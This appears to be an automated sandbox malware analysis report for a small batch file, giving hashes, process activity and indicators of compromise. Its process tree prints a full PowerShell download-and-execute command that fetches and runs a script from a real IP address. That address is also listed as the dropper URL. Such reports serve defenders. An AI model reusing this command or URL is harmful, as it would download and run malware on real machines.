Analysis
max time kernel: 118s
max time network: 121s
platform: windows10_x64
resource: win10v200217
submitted: 25-03-2020 22:10
Static task: static1
Behavioral task: behavioral1
  Sample: 3Nu9v5ZW.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: 3Nu9v5ZW.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: 3Nu9v5ZW.bat
Size: 195B
MD5: eecd3a82bcdfa01935bc0d836b329a5b
SHA1: f26fe622fd6b58796dfb119d4d506758bb63f495
SHA256: ab52018e0d9d17dd67e02f4ce6525d4e846f14b36348aab1c7c837c0596ac433
SHA512: 0842c48d0be5286338d2eee0e7af3643851758cd6504b4f4689b19d4ecc82c714ac7aa3c22f457c3dbe42e391b734949bed000fdbf206b8124367ec6ab0ec474
Score: 10/10
Malware Config
Extracted
Language: ps1
Source
URLs (ps1.dropper): http://185.103.242.78/pastes/3Nu9v5ZW
Signatures

Program crash (1 IoC)
Processes:
  pid    pid_target  process       target process
  3876   3512        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                 pid   process
  Token: SeRestorePrivilege   3876  WerFault.exe
  Token: SeBackupPrivilege    3876  WerFault.exe
  Token: SeDebugPrivilege     3876  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3876  WerFault.exe (14 occurrences)
Processes
1. C:\Windows\system32\cmd.exe
   C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\3Nu9v5ZW.bat"
   PID: 4024
  2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
     C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/3Nu9v5ZW');Invoke-ZMQGDQFFVPNG;Start-Sleep -s 10000"
     PID: 3512
    3. C:\Windows\SysWOW64\WerFault.exe
       C:\Windows\SysWOW64\WerFault.exe -u -p 3512 -s 700
       - Program crash
       - Suspicious use of AdjustPrivilegeToken
       - Suspicious behavior: EnumeratesProcesses
       PID: 3876